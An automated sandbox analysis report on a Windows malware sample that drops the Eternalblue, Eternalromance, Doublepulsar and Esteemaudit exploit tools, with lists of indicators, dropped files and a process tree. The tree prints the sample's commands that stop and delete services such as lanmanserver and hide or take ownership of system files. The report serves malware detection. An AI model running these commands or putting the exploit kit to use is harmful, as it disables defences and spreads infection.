Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-06-2024 05:58
Static task
static1
Behavioral task
behavioral1
Sample
898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
-
Size
4.4MB
-
MD5
898bbf64f5e0297bdd76cbd9ae5e4b81
-
SHA1
b978307d7df2d778201fbb6bdf8076ce51b913c2
-
SHA256
09a7c474a03954083379dbbe1aed0f2120776688c294ebedb71e3362113e9db2
-
SHA512
8a5b8f2d34231dcf056ab7b2216efedaddc6890efd5167cc8ee7611a8036f0c923b41230c5ab7887645ca018c37a8afc6ac4efb32f5abd28f8b928dbf1da6fd3
-
SSDEEP
98304:Hv3onZ+azh+78Wftj4puoeuaKhlrH9L7TRZ+ZHJtj/IcikcskwvOC+:wZTzh+wWftLoeghlpzX+ZHTgZwvk
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 105 4960 cscript.exe 254 8052 cscript.exe 1582 5580 cscript.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3728 netsh.exe -
Sets file execution options in registry 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe\debugger = "taskkill.exe" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe reg.exe -
Sets file to hidden 1 TTPs 17 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3344 attrib.exe 1744 attrib.exe 1276 attrib.exe 5380 attrib.exe 7460 attrib.exe 5336 attrib.exe 7828 attrib.exe 5364 attrib.exe 7292 attrib.exe 7736 attrib.exe 7692 attrib.exe 8080 attrib.exe 7760 attrib.exe 3956 attrib.exe 7944 attrib.exe 6472 attrib.exe 4940 attrib.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation conhost.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation Fileftp.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe -
Deletes itself 1 IoCs
pid Process 4016 WScript.exe -
Executes dropped EXE 8 IoCs
pid Process 3340 conhost.exe 928 Fileftp.exe 8084 conhost.exe 5864 Eternalblue-2.2.0.exe 6472 Eternalromance-1.4.0.exe 8040 Eternalchampion-2.0.0.exe 5492 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe -
Loads dropped DLL 64 IoCs
pid Process 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 8040 Eternalchampion-2.0.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 8040 Eternalchampion-2.0.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 5864 Eternalblue-2.2.0.exe 5864 Eternalblue-2.2.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 6472 Eternalromance-1.4.0.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 6112 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe 5492 Doublepulsar-1.3.1.exe -
Modifies file permissions 1 TTPs 17 IoCs
pid Process 1124 takeown.exe 8128 takeown.exe 8144 takeown.exe 7860 takeown.exe 2220 takeown.exe 7708 takeown.exe 5456 takeown.exe 5704 takeown.exe 4372 takeown.exe 2676 takeown.exe 1744 takeown.exe 1520 takeown.exe 5004 takeown.exe 5420 takeown.exe 4796 takeown.exe 2984 takeown.exe 968 takeown.exe -
resource yara_rule behavioral2/files/0x000700000002340e-23.dat upx behavioral2/memory/928-31-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-126-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-137-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-138-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-140-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-142-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-144-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-146-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-148-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-150-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-152-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-220-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-243-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-245-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-247-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral2/memory/928-249-0x0000000000400000-0x0000000000CB0000-memory.dmp upx -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: Fileftp.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\wmassrv.dll attrib.exe File opened for modification C:\Windows\SysWOW64\HalPluginsServices.dll attrib.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Windowsd\riar.dll Fileftp.exe File created C:\Program Files\Windowsd\trch-1.dll Fileftp.exe File created C:\Program Files\Windowsd\Eternalromance-1.4.0.xml Fileftp.exe File created C:\Program Files\Windowsd\crli-0.dll Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudit-2.1.0.exe Fileftp.exe File created C:\Program Files\Windowsd\libiconv-2.dll Fileftp.exe File created C:\Program Files\Windowsd\pcreposix-0.dll Fileftp.exe File created C:\Program Files\Windowsd\posh.dll Fileftp.exe File opened for modification C:\Program Files\Windowsd\x64.dll conhost.exe File created C:\Program Files\Windowsd\Eternalromance-1.4.0.exe Fileftp.exe File created C:\Program Files\Windowsd\shellcode.bin Fileftp.exe File created C:\Program Files\Windowsd\Eternalblue-2.2.0.exe Fileftp.exe File created C:\Program Files\Windowsd\x86.dll conhost.exe File created C:\Program Files\Windowsd\pcre-0.dll Fileftp.exe File created C:\Program Files\Windowsd\445.txt Fileftp.exe File created C:\Program Files\Windowsd\Fileftp.exe conhost.exe File opened for modification C:\Program Files\Windowsd\Fileftp.exe conhost.exe File created C:\Program Files\Windowsd\Eternalchampion-2.0.0.xml Fileftp.exe File created C:\Program Files\Windowsd\tibe.dll Fileftp.exe File created C:\Program Files\Windowsd\tibe-1.dll Fileftp.exe File created C:\Program Files\Windowsd\tibe-2.dll Fileftp.exe File created C:\Program Files\Windowsd\xdvl-0.dll Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.xml Fileftp.exe File created C:\Program Files\Windowsd\ucl.dll Fileftp.exe File created C:\Program Files\Windowsd\Eternalromance-1.3.0.fb Fileftp.exe File created C:\Program Files\Windowsd\dmgd-1.dll Fileftp.exe File created C:\Program Files\Windowsd\etch-0.dll Fileftp.exe File created C:\Program Files\Windowsd\etchCore-1.x86.dll Fileftp.exe File created C:\Program Files\Windowsd\libcurl.dll Fileftp.exe File created C:\Program Files\Windowsd\tucl.dll Fileftp.exe File created C:\Program Files\Windowsd\posh-0.dll Fileftp.exe File created C:\Program Files\Windowsd\trch-0.dll Fileftp.exe File created C:\Program Files\Windowsd\dmgd-4.dll Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudit-2.1.0.xml Fileftp.exe File created C:\Program Files\Windowsd\etchCore-0.x64.dll Fileftp.exe File created C:\Program Files\Windowsd\etchCore-1.x64.dll Fileftp.exe File created C:\Program Files\Windowsd\Eternalblue-2.2.0.xml Fileftp.exe File created C:\Program Files\Windowsd\libxml2.dll Fileftp.exe File opened for modification C:\Program Files\Windowsd\Fileftp.exe conhost.exe File created C:\Program Files\Windowsd\Eternalromance-1.4.0.fb Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudit-2.1.0.fb Fileftp.exe File created C:\Program Files\Windowsd\Eternalblue-2.2.0.fb Fileftp.exe File created C:\Program Files\Windowsd\riar-2.dll Fileftp.exe File opened for modification C:\Program Files\Windowsd\log.txt Eternalblue-2.2.0.exe File opened for modification C:\Program Files\Windowsd\log.txt Eternalromance-1.4.0.exe File created C:\Program Files\Windowsd\x64.dll conhost.exe File opened for modification C:\Program Files\Windowsd\x86.dll conhost.exe File created C:\Program Files\Windowsd\x86.dll Fileftp.exe File created C:\Program Files\Windowsd\etebCore-2.x64.dll Fileftp.exe File created C:\Program Files\Windowsd\zlib1.dll Fileftp.exe File opened for modification C:\Program Files (x86)\Microsoft MSBuild\Setting.exe attrib.exe File created C:\Program Files\Windowsd\cnli-1.dll Fileftp.exe File created C:\Program Files\Windowsd\coli-0.dll Fileftp.exe File created C:\Program Files\Windowsd\exma-1.dll Fileftp.exe File created C:\Program Files\Windowsd\libeay32.dll Fileftp.exe File created C:\Program Files\Windowsd\log.txt Eternalchampion-2.0.0.exe File created C:\Program Files\Windowsd\1.txt Eternalchampion-2.0.0.exe File created C:\Program Files\Windowsd\ssleay32.dll Fileftp.exe File created C:\Program Files\Windowsd\trfo-2.dll Fileftp.exe File created C:\Program Files\Windowsd\x64.dll Fileftp.exe File created C:\Program Files\Windowsd\adfw-2.dll Fileftp.exe File created C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe Fileftp.exe File created C:\Program Files\Windowsd\etchCore-0.x86.dll Fileftp.exe File created C:\Program Files\Windowsd\iconv.dll Fileftp.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\windows\Installer\conhost.exe 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File opened for modification C:\Windows\svchost.exe attrib.exe File opened for modification C:\Windows\debug\lsmos.exe attrib.exe File opened for modification C:\Windows\SpeechsTracing attrib.exe File created \??\c:\windows\inf\demo1.bat 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File opened for modification C:\Windows\system\lsaus.exe attrib.exe File opened for modification C:\Windows\boy.exe attrib.exe File created \??\c:\windows\inf\temp1.bat 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File opened for modification C:\Windows\SecureBootThemes attrib.exe File created C:\windows\Installer\free.bat 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File opened for modification C:\Windows\splwow64.exe attrib.exe File opened for modification C:\Windows\Fonts\Mysql attrib.exe File opened for modification C:\Windows\sysprepthemes attrib.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4864 sc.exe 3688 sc.exe 396 sc.exe 8140 sc.exe 4488 sc.exe 6388 sc.exe 4028 sc.exe 2408 sc.exe 568 sc.exe 4480 sc.exe 1404 sc.exe 752 sc.exe 7892 sc.exe 7848 sc.exe 4968 sc.exe 5392 sc.exe 1868 sc.exe 1276 sc.exe 7960 sc.exe 5636 sc.exe 960 sc.exe 776 sc.exe 2084 sc.exe 4072 sc.exe 1860 sc.exe 4548 sc.exe 4160 sc.exe 760 sc.exe 1624 sc.exe 3208 sc.exe 2932 sc.exe 4084 sc.exe 2956 sc.exe 5412 sc.exe 1268 sc.exe 7944 sc.exe 4332 sc.exe 2324 sc.exe 3528 sc.exe 1416 sc.exe 8056 sc.exe 5348 sc.exe 2352 sc.exe 5664 sc.exe 7964 sc.exe 1940 sc.exe 8204 sc.exe 3988 sc.exe 5644 sc.exe 8080 sc.exe 4396 sc.exe 5372 sc.exe 5480 sc.exe 6576 sc.exe 6392 sc.exe 3024 sc.exe 2636 sc.exe 2544 sc.exe 5212 sc.exe 2328 sc.exe 2060 sc.exe 2160 sc.exe 3200 sc.exe 5644 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8032 schtasks.exe 8092 schtasks.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 7772 ipconfig.exe -
Kills process with WMI 22 IoCs
pid Process 7880 WMIC.exe 7612 WMIC.exe 8184 WMIC.exe 3212 WMIC.exe 4936 WMIC.exe 4792 WMIC.exe 8016 WMIC.exe 7880 WMIC.exe 2344 WMIC.exe 4932 WMIC.exe 7232 WMIC.exe 7200 WMIC.exe 4504 WMIC.exe 1536 WMIC.exe 900 WMIC.exe 5296 WMIC.exe 5328 WMIC.exe 5464 WMIC.exe 5544 WMIC.exe 4480 WMIC.exe 6468 WMIC.exe 1276 WMIC.exe -
Kills process with taskkill 15 IoCs
pid Process 7860 taskkill.exe 7356 taskkill.exe 1512 taskkill.exe 2472 taskkill.exe 1152 taskkill.exe 5408 taskkill.exe 1380 taskkill.exe 2240 taskkill.exe 7020 taskkill.exe 5396 taskkill.exe 220 taskkill.exe 6508 taskkill.exe 4792 taskkill.exe 3440 taskkill.exe 5220 taskkill.exe -
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs Fileftp.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 8116 PING.EXE 2240 PING.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 2676 takeown.exe Token: SeDebugPrivilege 220 taskkill.exe Token: SeTakeOwnershipPrivilege 1124 takeown.exe Token: SeTakeOwnershipPrivilege 2220 takeown.exe Token: SeTakeOwnershipPrivilege 1744 takeown.exe Token: SeDebugPrivilege 7860 taskkill.exe Token: SeIncreaseQuotaPrivilege 8016 WMIC.exe Token: SeSecurityPrivilege 8016 WMIC.exe Token: SeTakeOwnershipPrivilege 8016 WMIC.exe Token: SeLoadDriverPrivilege 8016 WMIC.exe Token: SeSystemProfilePrivilege 8016 WMIC.exe Token: SeSystemtimePrivilege 8016 WMIC.exe Token: SeProfSingleProcessPrivilege 8016 WMIC.exe Token: SeIncBasePriorityPrivilege 8016 WMIC.exe Token: SeCreatePagefilePrivilege 8016 WMIC.exe Token: SeBackupPrivilege 8016 WMIC.exe Token: SeRestorePrivilege 8016 WMIC.exe Token: SeShutdownPrivilege 8016 WMIC.exe Token: SeDebugPrivilege 8016 WMIC.exe Token: SeSystemEnvironmentPrivilege 8016 WMIC.exe Token: SeRemoteShutdownPrivilege 8016 WMIC.exe Token: SeUndockPrivilege 8016 WMIC.exe Token: SeManageVolumePrivilege 8016 WMIC.exe Token: 33 8016 WMIC.exe Token: 34 8016 WMIC.exe Token: 35 8016 WMIC.exe Token: 36 8016 WMIC.exe Token: SeIncreaseQuotaPrivilege 8016 WMIC.exe Token: SeSecurityPrivilege 8016 WMIC.exe Token: SeTakeOwnershipPrivilege 8016 WMIC.exe Token: SeLoadDriverPrivilege 8016 WMIC.exe Token: SeSystemProfilePrivilege 8016 WMIC.exe Token: SeSystemtimePrivilege 8016 WMIC.exe Token: SeProfSingleProcessPrivilege 8016 WMIC.exe Token: SeIncBasePriorityPrivilege 8016 WMIC.exe Token: SeCreatePagefilePrivilege 8016 WMIC.exe Token: SeBackupPrivilege 8016 WMIC.exe Token: SeRestorePrivilege 8016 WMIC.exe Token: SeShutdownPrivilege 8016 WMIC.exe Token: SeDebugPrivilege 8016 WMIC.exe Token: SeSystemEnvironmentPrivilege 8016 WMIC.exe Token: SeRemoteShutdownPrivilege 8016 WMIC.exe Token: SeUndockPrivilege 8016 WMIC.exe Token: SeManageVolumePrivilege 8016 WMIC.exe Token: 33 8016 WMIC.exe Token: 34 8016 WMIC.exe Token: 35 8016 WMIC.exe Token: 36 8016 WMIC.exe Token: SeTakeOwnershipPrivilege 8144 takeown.exe Token: SeTakeOwnershipPrivilege 7708 takeown.exe Token: SeBackupPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeBackupPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeBackupPrivilege 928 Fileftp.exe Token: SeSecurityPrivilege 928 Fileftp.exe Token: SeDebugPrivilege 7356 taskkill.exe Token: SeDebugPrivilege 2240 taskkill.exe Token: SeIncreaseQuotaPrivilege 7880 WMIC.exe Token: SeSecurityPrivilege 7880 WMIC.exe Token: SeTakeOwnershipPrivilege 7880 WMIC.exe Token: SeLoadDriverPrivilege 7880 WMIC.exe Token: SeSystemProfilePrivilege 7880 WMIC.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 928 Fileftp.exe 928 Fileftp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4924 wrote to memory of 1976 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 84 PID 4924 wrote to memory of 1976 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 84 PID 4924 wrote to memory of 1976 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 84 PID 4924 wrote to memory of 2920 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 85 PID 4924 wrote to memory of 2920 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 85 PID 4924 wrote to memory of 2920 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 85 PID 4924 wrote to memory of 1860 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 86 PID 4924 wrote to memory of 1860 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 86 PID 4924 wrote to memory of 1860 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 86 PID 4924 wrote to memory of 4788 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 87 PID 4924 wrote to memory of 4788 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 87 PID 4924 wrote to memory of 4788 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 87 PID 4924 wrote to memory of 760 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 88 PID 4924 wrote to memory of 760 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 88 PID 4924 wrote to memory of 760 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 88 PID 4924 wrote to memory of 3452 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 89 PID 4924 wrote to memory of 3452 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 89 PID 4924 wrote to memory of 3452 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 89 PID 4924 wrote to memory of 752 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 93 PID 4924 wrote to memory of 752 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 93 PID 4924 wrote to memory of 752 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 93 PID 4924 wrote to memory of 4192 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 94 PID 4924 wrote to memory of 4192 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 94 PID 4924 wrote to memory of 4192 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 94 PID 4924 wrote to memory of 3988 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 95 PID 4924 wrote to memory of 3988 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 95 PID 4924 wrote to memory of 3988 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 95 PID 4924 wrote to memory of 3360 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 97 PID 4924 wrote to memory of 3360 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 97 PID 4924 wrote to memory of 3360 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 97 PID 4924 wrote to memory of 1552 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 101 PID 4924 wrote to memory of 1552 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 101 PID 4924 wrote to memory of 1552 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 101 PID 4924 wrote to memory of 1252 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 102 PID 4924 wrote to memory of 1252 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 102 PID 4924 wrote to memory of 1252 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 102 PID 4924 wrote to memory of 3972 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 103 PID 4924 wrote to memory of 3972 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 103 PID 4924 wrote to memory of 3972 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 103 PID 4924 wrote to memory of 3636 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 104 PID 4924 wrote to memory of 3636 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 104 PID 4924 wrote to memory of 3636 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 104 PID 4924 wrote to memory of 3472 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 105 PID 4924 wrote to memory of 3472 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 105 PID 4924 wrote to memory of 3472 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 105 PID 4924 wrote to memory of 3540 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 106 PID 4924 wrote to memory of 3540 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 106 PID 4924 wrote to memory of 3540 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 106 PID 4924 wrote to memory of 4404 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 107 PID 4924 wrote to memory of 4404 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 107 PID 4924 wrote to memory of 4404 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 107 PID 4924 wrote to memory of 3488 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 108 PID 4924 wrote to memory of 3488 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 108 PID 4924 wrote to memory of 3488 4924 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 108 PID 1976 wrote to memory of 1292 1976 net.exe 120 PID 1976 wrote to memory of 1292 1976 net.exe 120 PID 1976 wrote to memory of 1292 1976 net.exe 120 PID 4788 wrote to memory of 1876 4788 net.exe 121 PID 4788 wrote to memory of 1876 4788 net.exe 121 PID 4788 wrote to memory of 1876 4788 net.exe 121 PID 3360 wrote to memory of 3952 3360 net.exe 122 PID 3360 wrote to memory of 3952 3360 net.exe 122 PID 3360 wrote to memory of 3952 3360 net.exe 122 PID 4192 wrote to memory of 1284 4192 net.exe 123 -
Views/modifies file attributes 1 TTPs 24 IoCs
pid Process 5336 attrib.exe 7736 attrib.exe 1744 attrib.exe 7944 attrib.exe 8080 attrib.exe 6472 attrib.exe 7924 attrib.exe 3344 attrib.exe 3276 attrib.exe 1884 attrib.exe 4940 attrib.exe 7460 attrib.exe 7008 attrib.exe 8176 attrib.exe 3956 attrib.exe 1276 attrib.exe 2272 attrib.exe 5380 attrib.exe 3972 attrib.exe 7292 attrib.exe 7692 attrib.exe 7828 attrib.exe 7760 attrib.exe 5364 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵PID:1292
-
-
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵PID:2920
-
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵PID:1876
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
- Launches sc.exe
PID:760
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵PID:3452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵PID:3824
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
PID:752
-
-
C:\Windows\SysWOW64\net.exenet stop COMSysCts2⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop COMSysCts3⤵PID:1284
-
-
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts2⤵
- Launches sc.exe
PID:3988
-
-
C:\Windows\SysWOW64\net.exenet stop WmiAppSrv2⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WmiAppSrv3⤵PID:3952
-
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv2⤵PID:1552
-
-
